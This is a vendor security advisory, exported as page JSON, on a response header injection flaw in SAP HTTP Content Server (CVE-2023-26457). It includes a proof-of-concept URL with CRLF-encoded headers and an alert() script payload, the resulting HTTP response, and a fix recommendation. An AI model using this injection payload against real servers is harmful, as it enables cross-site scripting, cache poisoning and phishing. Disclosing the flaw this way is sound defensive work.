{"id":20879,"date":"2023-09-26T13:06:35","date_gmt":"2023-09-26T11:06:35","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=20879"},"modified":"2023-09-26T13:32:25","modified_gmt":"2023-09-26T11:32:25","slug":"usd-2022-0046","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0046\/","title":{"rendered":"usd-2022-0046"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.21.0\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n

usd-2022-0046 | Response Header Injection in SAP HTTP Content Server<\/h1>\n

Advisory ID<\/strong>: usd-2022-0046
\nAffected Product<\/strong>: SAP HTTP Content Server
\nAffected Version<\/strong>: Server Version 753 running Patch 1028, Build Version Auf 12 2022 (N)
\nVulnerability Type<\/strong>: Improper Neutralization of HTTP Headers for Scripting Syntax (CWE-644)
\nSecurity Risk<\/strong>: HIGH
\nVendor URL<\/strong>: https:\/\/www.sap.com\/germany\/index.html<\/a>
\nVendor acknowledged vulnerability<\/strong>: Yes
\nVendor Status<\/strong>: Fixed - for more details see References<\/a> below
\nCVE Link<\/strong>: CVE-2023-26457<\/a><\/p>\n

Description<\/h2>\n

The SAP HTTP Content Server returns error messages in the header x-errordescription<\/strong> of the HTTP Response.
\nWhen invalid input is provided in a HTTP request, it is also placed in the error message inside this header.
\nDuring this process the input is URL-decoded, therefore for example %41<\/strong> is translated to A<\/strong> and %0a<\/strong> is translated to a newline.<\/p>\n

This enables an attacker to add new headers and change the content of the response.<\/p>\n

Proof of Concept<\/h3>\n

The following URL provides an invalid value for the parameter pVersion<\/strong> which then is inserted in the x-errordescription<\/strong> header:<\/p>\n

\n
<\/span>[http:\/\/<IP><\/span>:1090\/sapcs?create&<\/span>pVersion=%0aContent-type%3atext\/html%0a%0a<script><\/span>alert(\"usd%20AG\")<\/script><\/span>]()\n<\/pre>\n<\/div>\n
The part %0aContent-type%3atext\/html<\/strong> adds a new header to the response and sets the content type to text\/html<\/strong> instead of the original text\/plain<\/strong>.
\nThis causes browsers to interpret HTML tags in the response.<\/p>\n
The next part %0a%0aalert(\"usd%20AG\")<\/strong> ends the header section of the response and adds an JavaScript payload to the body of the response.<\/p>\n
The complete HTTP response to this URL is as follows:<\/p>\n
\n
<\/span>HTTP<\/span>\/<\/span>1.1<\/span> 400<\/span> Bad Request<\/span>
x-servertype<\/span>:<\/span> SAP HTTP Content Server 7.53\/1028\/N<\/span>
x-errordescription<\/span>:<\/span> Unsupported protocol version:<\/span>
content-type<\/span>:<\/span>text\/html<\/span>\n\n\n<<\/span>script<\/span>><\/span>alert<\/span>(<\/span>\"usd AG\"<\/span>)<\/<\/span>script<\/span>><\/span>\nContent-type: text\/plain\nX-Query: create&<\/span>pVersion=%0aContent-type%3atext\/html%0a%0a<<\/span>script<\/span>><\/span>alert<\/span>(<\/span>\"usd%20AG\"<\/span>)<\/<\/span>script<\/span>><\/span>\nX-ServerDate: 2022-09-15\nX-ServerId: server=<<\/span>redacted<\/span>><\/span>\nContent-length: 452\nX-ServerTime: 12:53:46\nX-Status: 400\nX-pVersion:\nContent-type:text\/html\n\n<<\/span>script<\/span>><\/span>alert<\/span>(<\/span>\"usd AG\"<\/span>)<\/<\/span>script<\/span>><\/span>\n\nX-ServerType: SAP HTTP Content Server 7.53\/1028\/N\nX-ErrorDescription: Unsupported protocol version:\nContent-type:text\/html\n\n<<\/span>script<\/span>><\/span>alert<\/span>(<\/span>\"usd AG\"<\/span>)<\/<\/span>script<\/span>><\/span>\nX-Query: create&<\/span>pVersion=%0aContent-type%3atext\/html%0a%0a<<\/span>script<\/span>><\/span>alert<\/span>(<\/span>\"usd%20AG\"<\/span>)<\/<\/span>script<\/span>><\/span>\nX-ServerDate: 2022-09-15\nX-ServerId: server=<<\/span>redacted<\/span>><\/span>\nX-ServerTime: 12:53:46\nX-Status: 400\nX-pVersion:\nContent-type:text\/html\n\n<<\/span>script<\/span>><\/span>alert<\/span>(<\/span>\"usd AG\"<\/span>)<\/<\/span>script<\/span>><\/span>
<\/pre>\n<\/div>\n
This Cross-Site-Scripting attack is only one possibility for exploiting the underlying vulnerability. Attackers could also use it to carry out response splitting<\/em> or cache poisoning<\/em> attacks, or to conduct a phishing campaign<\/em>.<\/p>\n
Fix<\/h3>\n
It is recommended to perform output validation in order to filter\/escape\/encode unsafe data that is being passed from the server in an HTTP response header.
\nFor details on SAP's fix see https:\/\/launchpad.support.sap.com\/#\/notes\/3281484.<\/a><\/p>\n
References<\/h3>\n
https:\/\/launchpad.support.sap.com\/#\/notes\/3281484<\/a>
\nhttps:\/\/www.sap.com\/documents\/2022\/02089613a0-167e-0010-bca6-c68f7e60039b.html<\/a>
\nhttps:\/\/cwe.mitre.org\/data\/definitions\/644.html<\/a>
\nhttps:\/\/capec.mitre.org\/data\/definitions\/34.html<\/a>
\nhttps:\/\/cwe.mitre.org\/data\/definitions\/113.html<\/a><\/p>\n
Timeline<\/h3>\n